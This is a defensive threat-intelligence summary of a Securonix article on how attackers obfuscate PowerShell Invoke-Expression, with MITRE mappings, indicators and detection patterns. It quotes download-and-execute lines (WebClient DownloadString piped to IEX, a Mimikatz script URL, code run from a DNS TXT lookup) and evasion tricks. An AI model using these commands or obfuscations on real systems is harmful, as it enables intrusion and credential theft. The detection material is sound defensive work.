Keypoints
- IEX (Invoke-Expression) is commonly used to evaluate and execute code in PowerShell and is frequently targeted by attackers to launch payloads.
- Attackers obfuscate IEX using methods such as splitting strings, character substitution (including [char] integer values), and reordering format strings to evade detection.
- Variable extraction techniques pull I, E, X from reliable system variables ($PSHome, $env:COMSPEC, $ShellID) or from Get-Variable results (e.g., MaximumDriveCount) to assemble “IEX”.
- “Globfuscation” leverages Get-Alias or Get-Command with wildcard patterns (e.g., (gal ?e[?x])) to extract the alias “iex”.
- Remote retrieval techniques include downloading scripts via web (obfuscated raw.githubusercontent URL for Invoke-Mimikatz) or invoking code from DNS TXT records using nslookup and PowerShell.
- Payloads may be XOR-encoded and executed after assembly; these obfuscation methods can bypass AV/AMSI and run on patched Windows hosts.
- Detection guidance: enable PowerShell scriptblock logging (EVID 4104), use the provided Securonix Spotter queries, and apply listed Securonix detection policies.
MITRE Techniques
- [T1027] Obfuscated Files or Information – Obfuscation used to hide IEX and payloads; quote: ‘obfuscation is a useful tool to help them achieve this. It is an effective way to bypass signature detection as it randomizes malicious strings.’
- [T1140] Deobfuscate/Decode Files or Information – Attackers encode payloads (e.g., XOR) and then decode at execution; quote: ‘The IEX command is then used to execute the second half of the command which is XOR encoded.’
- [T1059.001] Command and Scripting Interpreter: PowerShell – IEX is used to execute downloaded or assembled PowerShell code; quote: ‘Invoke expressions (IEX) in PowerShell are a common method of executing code.’
Indicators of Compromise
- [Domain] remote/script hosting used for payload delivery – hxxps://raw.githubusercontent[.]com/maliciousness/Invoke-Mimikatz.ps1 (obfuscated example), remote.dns.server (DNS TXT C2)
- [File name] downloaded/executed script – Invoke-Mimikatz.ps1 used in examples to deliver Mimikatz functionality
- [Command pattern] PowerShell / DNS invocation examples – IEX(New-Object Net.WebClient).DownloadString(…), & powershell .(nslookup -q=txt remote.dns.server)[-1]
- [PowerShell variables] environment/variable extraction used to assemble IEX – $PSHome, $env:COMSPEC, $ShellID, and MaximumDriveCount used to extract characters
PowerShell’s Invoke-Expression (IEX) evaluates strings or variables as code; attackers use it to execute local or remote payloads (example: IEX(New-Object Net.WebClient).DownloadString(…)) and to pipe downloaded content into IEX. There are two common invocation styles: calling IEX(…) directly, or piping an evaluated command into IEX at the end, so detection should inspect both patterns in scriptblock logs (EVID 4104) and process command lines.
Multiple obfuscation techniques are used to conceal IEX: simple string splitting or joining of characters; character substitution via [char] integer values; extracting I/E/X characters from environment or PowerShell variables ($PSHome, $env:COMSPEC, $ShellID) or Get-Variable results (e.g., MaximumDriveCount). Globfuscation uses Get-Alias or Get-Command with wildcards (e.g., (gal ?e[?x]) or (gcm ?e[?x])) to match and extract ‘iex’. Reordering uses format strings and the -f operator to assemble characters in non-linear order. Attackers may also retrieve executable text from DNS TXT records (e.g., & powershell .(nslookup -q=txt remote.dns.server)[-1]) and execute XOR-encoded payloads that are decoded at runtime.
For detection, enable PowerShell scriptblock logging (EVID 4104) and look for patterns such as indexed extractions ($pshome[), [char] or [char[]] with -join, .(gal / Get-Alias) wildcard patterns that match ‘?e[?x]’, Get-Variable with .name[3,11,2] and -join, format string usage with -f and ‘}{0}’ patterns, and nslookup -q=txt with [-1]. The article provides Securonix Spotter queries and detection policy IDs to operationalize these indicators in SIEM/SOAR workflows.
Read more: https://www.securonix.com/blog/hiding-the-powershell-execution-flow/